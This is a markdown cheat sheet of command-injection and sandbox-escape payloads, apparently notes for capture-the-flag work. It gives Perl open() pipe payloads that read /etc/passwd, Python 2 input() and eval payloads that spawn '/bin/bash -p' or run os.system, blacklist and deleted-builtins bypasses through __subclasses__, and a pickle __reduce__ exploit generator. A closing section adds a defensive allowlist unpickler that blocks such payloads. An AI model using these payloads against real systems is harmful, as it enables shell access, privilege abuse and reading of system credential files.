# Command Injection

```tab="Perl open(F, $file)"
# From perldoc open: if the filename begins with "|", the filename is interpreted
# as a command to which output is to be piped, and if the filename ends with a "|",
# the filename is interpreted as a command which pipes output to us.
# Append | to the end of a file name to have open execute the file:
/path/to/script|
# | command to execute:
| cat /etc/passwd | whoami; id; pwd
1>&2|
cat /etc/passwd 1>&2| cat .passwd|xargs touch| # tries to create a file named with the flag contents
```
```python tab="Python2 input()"
# input() is equivalent to eval(raw_input(prompt))
sys.stdout.write(open("/etc/passwd").readline())
execfile("/PATH/TO/SCRIPT")
open('/tmp/passwd', 'w').write(open('/etc/passwd').readline().strip())
eval(compile('import os; os.system("id")', 'foobar.py', 'exec'))
eval(compile('import os; os.system("/bin/bash -p")', 'f', 'exec'))
# redefine script functions:
eval(compile('def youLose():\n print passwd','foobar.py','exec'))
# redefine builtin functions:
eval(compile('int = __builtins__.__dict__["print"]','foobar.py','exec'))
__import__('os').system('/bin/bash -p')
__import__('os').execl('/bin/sh','sh')
# set PYTHONINSPECT before executing the python script to enter interactive
# mode after executing the script or the command (shell, not python):
declare -x PYTHONINSPECT='1' ;
```
```python tab="python eval/exec (blacklisted input)"
# if quotes (single and double) are blacklisted:
# use a combination of dir() and getattr(),
# specifically func_globals
for x in dir(FUNCTION): print {x: getattr(FUNCTION, x)}

os = eval('im' + 'port("os")')
getattr(os, "system")
# if builtins are deleted:
# https://zolmeister.com/2013/05/escaping-python-sandbox.html
().__class__.__base__.__subclasses__()[59].__enter__.__func__.__globals__['linecache'].checkcache.__globals__['os'].system
# 59 =
```
```python tab="python pickle exploit"
import os
import pickle

def pickle_me(cmd):
    class Exploit(object):
        def __reduce__(self):
            # return (eval('os.system'), (cmd,))
            return (os.system, (cmd,))
    return pickle.dumps(Exploit())
```
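The defensive counterpart to the pickle payload above, added here as an example that is not part of the original notes: a restricted unpickler whose `find_class` refuses any global not on an allowlist, so a `__reduce__` payload naming `os.system` is rejected before the unpickler can call it. The `SAFE_GLOBALS` allowlist and the `_Payload` test class are constructed for this demo.

```python
import io
import os
import pickle

# Allowlist of (module, name) pairs an untrusted pickle may reference.
# Assumed for this demo; a real service lists only the types it actually serializes.
SAFE_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Refuses every global lookup not on SAFE_GLOBALS.

    A __reduce__ payload (like pickle_me() above) is stored as a GLOBAL opcode
    naming the callable plus its arguments; find_class runs on that opcode, so
    the callable is rejected before the unpickler can invoke it."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def load_untrusted(data):
    """Return ("ok", obj) or ("rejected", reason). Never falls back to pickle.loads."""
    try:
        return "ok", RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:
        return "rejected", str(exc)


class _Payload:
    """Constructed test payload shaped like the exploit above. The command is
    harmless and is never executed: os.system is not on the allowlist (pickle
    records it under its C module name, 'posix' on Linux)."""

    def __reduce__(self):
        return (os.system, ("true",))


def demo():
    benign = pickle.dumps({"user": "alice", "roles": frozenset({"viewer"})})
    hostile = pickle.dumps(_Payload())
    return load_untrusted(benign), load_untrusted(hostile)


if __name__ == "__main__":
    print(demo())
```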